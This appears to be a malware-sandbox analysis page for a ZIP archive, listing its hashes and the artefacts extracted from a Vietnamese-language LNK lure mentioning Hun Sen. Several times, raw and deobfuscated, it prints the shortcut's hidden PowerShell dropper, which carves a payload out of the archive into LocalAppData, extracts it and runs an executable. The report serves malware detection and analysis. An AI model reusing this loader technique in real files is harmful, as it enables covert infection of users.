Malicious

68fb52b33313ee800548cca389407ad1

ZIP Archive
|
MD5: 68fb52b33313ee800548cca389407ad1
|
Size: 687.85 KB
|
application/zip

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	68fb52b33313ee800548cca389407ad1
Sha1	62e4f702c3a88a17377507a8f27775a7b6bdea6f
Sha256	30f2a49ddba3f7a1b76124c112b6d01da4d440754f63441e12b1e30672a7ec0c
Sha384	d49821ea6f1219eac8ed4db753009e9447ba25a16d31cf512451fb9924f0f185910accec62238d5363bfb47f86546e8f
Sha512	0bb05fe96a5d1678ee3067662d7339f83bec3b016208eec5a5343d56fa697eb46832d5584a8c7ca9a12394b7f58aa7bbb3de8c9fb6cf47ee8eb1d2731dd7b5a0
SSDeep	12288:oGRXbdq0bEP9WXuGEmp0FSt7M7h2uRflhzSZ1s7rR04bqDY001b7undDGH:oGRrdqhP9guG7p0FSt72h1s/s3R04bCs
TLSH	19E4CF40B2B3D9A2E1AF113491A297685E2C7C768FB495CB77855BCF6E703C0DA34B06

File Structure

Artefacts

Name0	Value
LNK: Command Execution	powershell.exe -w H ";$irgqdfyxb = (ls -Pa $Home -Re -in 'Tin A5 chào x? giao Ch? t?ch Hun Sen.zip')[0].fullname;$qrvfuqsezoq = [SyStem.IO.File]::OpenReAd($irgqdfyxb); $fft='wRI'+'teAlL'+'bYtEs';$foolpsny = NeW-ObjEct byte[] $qrvfuqsezoq.Length; $qrvfuqsezoq.Read($foolpsny, 0, $foolpsny.Length); $qrvfuqsezoq.Close();$vdzywjadena=1144; ;;[SySTem.IO.FIle]::$fft($Env:LocalAppdata+'\\nismyjusj.vo', $foolpsny[$vdzywjadena..($vdzywjadena+686592-1)]);;tAR -xvf $Env:LocalAppdata\nismyjusj.vo -C $Env:LocalAppdata;Sleep -Seconds 4;powershell $Env:LocalAppdata\43OZ1LSA-M5GN-5TIS-ELUJ-IWP8UGQAUSCE\CNMNSST.exe;
Deobfuscated PowerShell	-w "H" ";$irgqdfyxb = (ls -Pa $Home -Re -in 'Tin A5 chào x? giao Ch? t?ch Hun Sen.zip')[0].fullname;$qrvfuqsezoq = [SyStem.IO.File]::OpenReAd($irgqdfyxb); $fft='wRIteAlLbYtEs';$foolpsny = NeW-ObjEct byte[] $qrvfuqsezoq.Length; $qrvfuqsezoq.Read($foolpsny, 0, $foolpsny.Length); $qrvfuqsezoq.Close();$vdzywjadena=1144; ;;[SySTem.IO.FIle]::$fft($Env:LocalAppdata+'\\nismyjusj.vo', $foolpsny[$vdzywjadena..($vdzywjadena+686592-1)]);;tAR -xvf $Env:LocalAppdata\nismyjusj.vo -C $Env:LocalAppdata;Sleep -Seconds 4;powershell $Env:LocalAppdata\43OZ1LSA-M5GN-5TIS-ELUJ-IWP8UGQAUSCE\CNMNSST.exe;"
Deobfuscated PowerShell	-w "H" ";$irgqdfyxb = (ls -Pa $Home -Re -in 'Tin A5 chào x? giao Ch? t?ch Hun Sen.zip')[0].fullname;$qrvfuqsezoq = [SyStem.IO.File]::OpenReAd($irgqdfyxb); $fft='wRIteAlLbYtEs';$foolpsny = NeW-ObjEct byte[] $qrvfuqsezoq.Length; $qrvfuqsezoq.Read($foolpsny, 0, $foolpsny.Length); $qrvfuqsezoq.Close();$vdzywjadena=1144; ;;[SySTem.IO.FIle]::$fft($Env:LocalAppdata+'\\nismyjusj.vo', $foolpsny[$vdzywjadena..($vdzywjadena+686592-1)]);;tAR -xvf $Env:LocalAppdata\nismyjusj.vo -C $Env:LocalAppdata;Sleep -Seconds 4;powershell $Env:LocalAppdata\43OZ1LSA-M5GN-5TIS-ELUJ-IWP8UGQAUSCE\CNMNSST.exe;"
Deobfuscated PowerShell	$Env:LocalAppdata \43oz1lsa-m5gn-5tis-eluj-iwp8ugqausce\cnmnsst.exe

68fb52b33313ee800548cca389407ad1 (687.85 KB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
LNK: Command Execution	powershell.exe -w H ";$irgqdfyxb = (ls -Pa $Home -Re -in 'Tin A5 chào x? giao Ch? t?ch Hun Sen.zip')[0].fullname;$qrvfuqsezoq = [SyStem.IO.File]::OpenReAd($irgqdfyxb); $fft='wRI'+'teAlL'+'bYtEs';$foolpsny = NeW-ObjEct byte[] $qrvfuqsezoq.Length; $qrvfuqsezoq.Read($foolpsny, 0, $foolpsny.Length); $qrvfuqsezoq.Close();$vdzywjadena=1144; ;;[SySTem.IO.FIle]::$fft($Env:LocalAppdata+'\\nismyjusj.vo', $foolpsny[$vdzywjadena..($vdzywjadena+686592-1)]);;tAR -xvf $Env:LocalAppdata\nismyjusj.vo -C $Env:LocalAppdata;Sleep -Seconds 4;powershell $Env:LocalAppdata\43OZ1LSA-M5GN-5TIS-ELUJ-IWP8UGQAUSCE\CNMNSST.exe; Malicious	68fb52b33313ee800548cca389407ad1 > Tin A5 chào xã giao Chủ tịch Hun Sen.lnk
Deobfuscated PowerShell	-w "H" ";$irgqdfyxb = (ls -Pa $Home -Re -in 'Tin A5 chào x? giao Ch? t?ch Hun Sen.zip')[0].fullname;$qrvfuqsezoq = [SyStem.IO.File]::OpenReAd($irgqdfyxb); $fft='wRIteAlLbYtEs';$foolpsny = NeW-ObjEct byte[] $qrvfuqsezoq.Length; $qrvfuqsezoq.Read($foolpsny, 0, $foolpsny.Length); $qrvfuqsezoq.Close();$vdzywjadena=1144; ;;[SySTem.IO.FIle]::$fft($Env:LocalAppdata+'\\nismyjusj.vo', $foolpsny[$vdzywjadena..($vdzywjadena+686592-1)]);;tAR -xvf $Env:LocalAppdata\nismyjusj.vo -C $Env:LocalAppdata;Sleep -Seconds 4;powershell $Env:LocalAppdata\43OZ1LSA-M5GN-5TIS-ELUJ-IWP8UGQAUSCE\CNMNSST.exe;" Malicious	68fb52b33313ee800548cca389407ad1 > Tin A5 chào xã giao Chủ tịch Hun Sen.lnk > LNK CommandLine
Deobfuscated PowerShell	-w "H" ";$irgqdfyxb = (ls -Pa $Home -Re -in 'Tin A5 chào x? giao Ch? t?ch Hun Sen.zip')[0].fullname;$qrvfuqsezoq = [SyStem.IO.File]::OpenReAd($irgqdfyxb); $fft='wRIteAlLbYtEs';$foolpsny = NeW-ObjEct byte[] $qrvfuqsezoq.Length; $qrvfuqsezoq.Read($foolpsny, 0, $foolpsny.Length); $qrvfuqsezoq.Close();$vdzywjadena=1144; ;;[SySTem.IO.FIle]::$fft($Env:LocalAppdata+'\\nismyjusj.vo', $foolpsny[$vdzywjadena..($vdzywjadena+686592-1)]);;tAR -xvf $Env:LocalAppdata\nismyjusj.vo -C $Env:LocalAppdata;Sleep -Seconds 4;powershell $Env:LocalAppdata\43OZ1LSA-M5GN-5TIS-ELUJ-IWP8UGQAUSCE\CNMNSST.exe;" Malicious	68fb52b33313ee800548cca389407ad1 > Tin A5 chào xã giao Chủ tịch Hun Sen.lnk > LNK CommandLine > [Deobfuscated PS]
Deobfuscated PowerShell	$Env:LocalAppdata \43oz1lsa-m5gn-5tis-eluj-iwp8ugqausce\cnmnsst.exe Malicious	68fb52b33313ee800548cca389407ad1 > Tin A5 chào xã giao Chủ tịch Hun Sen.lnk > LNK CommandLine > [PowerShell Command]

You must be signed in to post a comment.

An error has occurred. This application may no longer respond until reloaded. Reload 🗙